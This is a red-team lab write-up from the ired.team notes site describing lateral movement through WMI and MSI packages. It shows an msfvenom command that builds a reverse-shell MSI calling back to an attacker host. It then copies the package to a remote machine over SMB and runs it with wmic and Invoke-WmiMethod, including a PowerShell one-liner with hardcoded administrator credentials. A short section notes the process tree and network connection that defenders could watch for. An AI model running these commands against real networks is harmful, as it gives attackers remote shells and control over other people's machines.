Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
WinRM for Lateral Movement
WinRS for Lateral Movement
WMI for Lateral Movement
RDP Hijacking for Lateral Movement with tscon
Shared Webroot
Lateral Movement via DCOM
WMI + MSI Lateral Movement
Lateral Movement via Service Configuration Manager
Lateral Movement via SMB Relaying
WMI + NewScheduledTaskAction Lateral Movement
WMI + PowerShell Desired State Configuration Lateral Movement
Simple TCP Relaying with NetCat
Empire Shells with NetNLTMv2 Relaying
Lateral Movement with Psexec
From Beacon to Interactive RDP Session
SSH Tunnelling / Port Forwarding
Lateral Movement via WMI Event Subscription
Lateral Movement via DLL Hijacking
Lateral Movement over headless RDP with SharpRDP
Man-in-the-Browser via Chrome Extension
ShadowMove: Lateral Movement by Duplicating Existing Sockets
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

WMI + MSI Lateral Movement

WMI lateral movement with .msi packages

Execution

Generating malicious payload in MSI (Microsoft Installer Package):

[email protected]
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f msi > evil64.msi

I tried executing the .msi payload like so, but got a return code 1619 and a quick search on google returned nothing useful:

[email protected]
wmic /node:10.0.0.7 /user:offense\administrator product call install PackageLocation='\\10.0.0.2\c$\experiments\evil64.msi'

I had to revert to a filthy way of achieving the goal:

[email protected]
net use \\10.0.0.7\c$ /user:[email protected]; copy C:\experiments\evil64.msi \\10.0.0.7\c$\PerfLogs\setup.msi ; wmic /node:10.0.0.7 /user:[email protected] product call install PackageLocation=c:\PerfLogs\setup.msi

Additionally, the same could of be achieved using powershell cmdlets:

[email protected]
Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential (Get-Credential)

Get a prompt for credentials:

and enjoy the code execution:

Or if no GUI is available for credentials, a oneliner:

[email protected]
$username = 'Administrator';$password = '123456';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-WmiMethod -Path win32_product -name install -argumentlist @($true,"","c:\PerfLogs\setup.msi") -ComputerName pc-w10 -Credential $credential

Observations

Note the process ancestry: services > msiexec.exe > .tmp > cmd.exe:

and that the connection is initiated by the .tmp file (I ran another test, hence another file name):

References

Previous
Lateral Movement via DCOM
Next
Lateral Movement via Service Configuration Manager
Last updated 3 years ago
Contents
Execution
Observations
References